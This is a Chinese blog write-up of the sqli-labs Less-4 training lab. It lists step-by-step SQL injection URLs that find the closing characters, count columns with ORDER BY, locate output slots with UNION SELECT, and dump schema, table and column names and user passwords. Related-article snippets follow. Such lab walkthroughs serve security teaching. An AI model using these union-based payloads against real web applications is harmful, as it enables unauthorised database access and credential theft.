SQL注入靶场sqli-labs less-4

最新推荐文章于 2024-10-05 00:24:42 发布
最新推荐文章于 2024-10-05 00:24:42 发布
阅读量674 收藏 17
点赞数 24
分类专栏: sqli-labs靶场 文章标签: sql less 数据库 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wanggonghanfei/article/details/142676461
版权

sqli-labs靶场第三关less-4

在这里插入图片描述

1、确定注入点

http://192.168.128.3/sq/Less-4/?id=1
http://192.168.128.3/sq/Less-4/?id=2
有不同回显,判断可能存在注入,

2、判断注入类型

输入

http://192.168.128.3/sq/less-4/?id=1 and 1=1
http://192.168.128.3/sq/less-4/?id=1 and 1=2
回显一致,猜测不是数字型注

加单引号

http://192.168.128.3/sq/less-4/?id=1’
没有回显,猜测其他闭合方式
输入双引号
http://192.168.128.3/sq/Less-4/?id=1“

报出错误

在这里插入图片描述
由结果判断闭合方式为 ")

3、确定列数

http://192.168.128.3/sq/less-4/?id=1") order by 5 --+
http://192.168.128.3/sq/less-4/?id=1") order by 4 --+
http://192.168.128.3/sq/less-4/?id=1") order by 3 --+

4,5回显报错,3的时候回显
确定列数为3

4、确定回显位

http://192.168.128.3/sq/less-4/?id=-1") union select 1,2,3 --+

在这里插入图片描述
确定2,3为回显位置

5、确定数据库名,数据库版本

http://192.168.128.3/sq/Less-4/?id=-1") union select 1,version(),database()–+

在这里插入图片描述

5、爆出数据库名,表名,列名,数据

  • 爆出数据库名
    http://192.168.128.3/sq/less-4/?id=-1") union select 1,group_concat(schema_name),3 from information_schema.schemata --+
  • 爆出选定数据库表名
    http://192.168.128.3/sq/less-4/?id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()–+
  • 爆出列名
    http://192.168.128.3/sq/less-4/?id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=‘users’–+
  • 爆出数据
    http://192.168.128.3/sq/less-4/?id=-1") union select 1,group_concat(username,‘%20’,password),3 from security.users–+

最终得到数据
在这里插入图片描述

大功告成

子非鱼999
关注
专栏目录
sql注入靶场sqli-labs常见sql注入漏洞详解
网安小菜鸡的博客
08-05 715
把表里面每一行的结果拼成一个字符串输出(
SQL注入SQLI-LABS靶场通关秘籍
Sunnie_yoo的博客
07-03 1285
反之,参数不符合规范,则会触发报错,我们就是利用这个,通过 updatexml() 函数的报错回显我们需要的信息。注入流程与 Less-5 类似,不过这里的判断标准不是回显的信息,而是响应时间。因此网页存在字符型注入漏洞,并且使用单引号和括号进行闭合,注意到此网页并没有返回任何信息,我们需要使用 Bool 盲注进行注入。注入万能密码试试,用户名随便写点东西,使用 OR 运算符构造恒真条件,使用“#”注释掉后面的内容注入,网页提示我们注入成功,由于此时使用的时单引号闭合,因此这里是字符型注入。
毕业实习(五)SQL注入sqli-labs靶场
Nightwiggle的博客
09-02 1105
1.信息收集:识别目标应用的输入点(如表单字段、URL参数、HTTP头部等),并了解应用的数据库类型和结构。2.测试点注入:在输入字段中尝试插入简单的SQL注入payload(如`' OR '1'='1`),观察应用的响应来确定是否存在SQL注入漏洞。3.确定注入类型:-错误基于注入:观察SQL错误消息,推测数据库结构。-盲注:通过不同的响应时间或页面行为判断数据库内容(如时间延迟注入)。
SQL注入sqli-labs靶场第三关
aihua002的博客
08-11 539
1.主要考察闭合方式 ’ 和)2.order by 猜解字段数3.union 联合查询4.对MySQL数据库的information_schema库中的schemata,tables,columns,表的熟悉。
SQL注入sqli-labs
m0_60716947的博客
04-08 7453
目录 (一)搭建 sqli-labs 靶场 (二)sqli-labs的第一关至第四关笔记 (1)第一关 sqli-labs 是一款基于 sql 注入的游戏教程,有利于更好地了解 sql 注入的语法。 (一)搭建 sqli-labs 靶场 搭建 sqli-labs 靶场前首先要下载 phpstudy phpstudy下载链接:https://www.xp.cn 要保证安装路径中不能有空格和中文。 下载完成后: 可以对 root 数据库进行修改密码或创建数据库,然后在软件管理..
SQL注入-SQLi-LABS靶场1-65完整payload
问彡心的博客
12-27 1291
【代码】SQL注入-SQLi-LABS靶场1-65完整payload。
SQL注入sqli-labs靶场(1-22关) sqlmap注入
good good study day day up
06-29 831
SQL注入 sqli-labs靶场(1-22关) sqlmap注入
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 15万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sql注入sqli-labs靶场前几关讲解
m0_70483044的博客
01-09 2028
sql注入简介SQL注入是一种常见的web安全漏洞。sql注入是通过恶意的sql查询或者添加语句插入到应用的输入参数中,再在后台sql服务器解析执行进行的攻击。sql注入原因在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的"数据"拼接到SQL语句中,被当作是SQL语句的一部分执行,从而导致数据库受损。是目前黑客对数据库进行攻击的最常用手段之一。sql注入攻击对象数据库漏洞原因分析web分别前端和后端,前端负责进行展示后端负责处理来自前端的请求并提供前端展示的资源。
PHP、Apache环境中部署sqli-labs(SQL注入靶场
01-08
PHP、Apache 环境中部署 sqli-labs(SQL 注入靶场) 知识点 1: sqli-labs 介绍 sqli-labs 是一款开源的练习 SQL 注入的靶场工具,用 PHP 代码编写而成。它需要 PHP 和 Apache 环境运行。sqli-labs 提供了一个实践 ...
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1442
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1913
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
Sqli-labs靶场第16关详解[Sqli-labs-less-16]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 737
-batch当你需要以批处理模式运行 sqlmap,避免任何用户干预 sqlmap 的运行,可以强制使用--batch这个开关。这样,当 sqlmap 需要用户输入信息时,都将会以默认参数运行。由于这题是,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件爆出当前主机名称。
掌握嵌套子查询:复杂 SQL 中 * 列的准确表列关系
最新发布
学习之余随便记记
10-05 604
本文重点讨论在具有 * 列的嵌套子查询中建立表和列之间正确关系的挑战。使用 Teradata SQL 代码示例来说明该过程。本文聚焦于一个别名为 SUBSCRIBER_ 的子查询及其派生的列,这些列在外层查询中被使用。有些列在子查询的选择列表中被明确列出,而其他一些列则来自一个列(SUBSCR.),这个*列引用了 PRD2_ODW.SUBSCRIBER_ 表。接着,分析检查了外层查询的选择列表,特别是来自 SUBSCRIBER_ 子查询的列。
实用SQL小总结
UntifA的博客
09-29 1365
SQL记录
PostgreSQL的表碎片
文牧之的博客
09-29 556
表碎片化是指表数据在文件系统中的不连续存储,导致读取和写入操作的效率降低。频繁的插入和删除:导致数据块中出现“空洞”。更新操作:由于 PostgreSQL 的 MVCC(多版本并发控制)机制,更新操作会生成新的行版本,原来的空间会被标记为可重用但是不立即回收。
PostgreSQL 字段使用pglz压缩测试
文牧之的博客
09-30 565
创建测试表1,并插入1000w行数据–创建测试表2,使用 pglz压缩字段,并插入1000w行数据对比表yewu1.test1和yewu1.test2的大小,没体现出压缩了。
SQL中基本SELECT语句及常见关键字的使用(内连接,左/右连接)
qq_43800449的博客
09-29 998
DDL(Data Definition Languages)语句:数据定义语言,这些语句定义了不同的数据段、数据库、表、列、索引等数据库对象的定义。常用的语句关键字主要包括 create 、 drop 、 alter 、create等。DML(Data Manipulation Language)语句:数据操纵语句,用于添加、删除、更新和查询数据库记录(增删改查),并检查数据完整性,常用的语句关键字主要包括 insert 、 delete 、 update 等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值